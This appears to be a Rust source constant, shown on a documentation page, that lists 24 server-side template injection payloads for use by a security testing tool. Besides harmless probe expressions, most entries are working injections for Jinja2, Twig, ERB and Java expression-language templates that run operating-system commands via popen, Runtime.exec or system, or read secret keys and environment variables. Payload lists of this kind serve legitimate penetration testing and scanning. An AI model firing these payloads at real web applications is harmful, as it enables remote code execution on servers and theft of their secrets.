pub const SSTI: &str = "{{7*7}}\n{{7*\'7\'}}\n${7*7}\n<%=7*7%>\n#{7*7}\n*{7*7}\n@(7*7)\n~[7*7]\n{{config}}\n{{config.items()}}\n{{settings}}\n{{settings.SECRET_KEY}}\n{{self._TemplateReference__context}}\n{{request.application.__globals__.__builtins__.__import__(\'os\').popen(\'id\').read()}}\n${T(java.lang.Runtime).getRuntime().exec(\'id\')}\n${T(java.lang.System).getenv()}\n#{T(java.lang.Runtime).getRuntime().exec(\'id\')}\n<%= system(\'id\') %>\n<%= `id` %>\n{{_self.env.registerUndefinedFilterCallback(\'exec\')}}{{_self.env.getFilter(\'id\')}}\n{{[\'id\']|filter(\'system\')}}\n{{[\'id\']|map(\'system\')|join}}\n{{config.__class__.__init__.__globals__[\'os\'].popen(\'id\').read()}}\n{{\'\'.__class__.mro()[1].__subclasses__()[396](\'id\',shell=True,stdout=-1).communicate()[0].strip()}}";Expand description
Server-side template injection payloads (24 patterns)